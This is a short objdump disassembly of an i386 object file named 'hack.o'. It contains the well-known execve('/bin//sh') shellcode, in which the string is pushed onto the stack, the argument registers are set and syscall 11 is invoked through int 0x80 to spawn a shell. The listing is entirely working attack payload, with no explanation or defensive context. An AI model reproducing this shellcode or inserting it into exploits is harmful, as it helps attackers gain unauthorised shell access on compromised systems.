
hack.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:	31 c0                	xor    %eax,%eax
   2:	50                   	push   %eax
   3:	68 2f 2f 73 68       	push   $0x68732f2f
   8:	68 2f 62 69 6e       	push   $0x6e69622f
   d:	89 e3                	mov    %esp,%ebx
   f:	50                   	push   %eax
  10:	89 e2                	mov    %esp,%edx
  12:	53                   	push   %ebx
  13:	89 e1                	mov    %esp,%ecx
  15:	b0 0b                	mov    $0xb,%al
  17:	cd 80                	int    $0x80
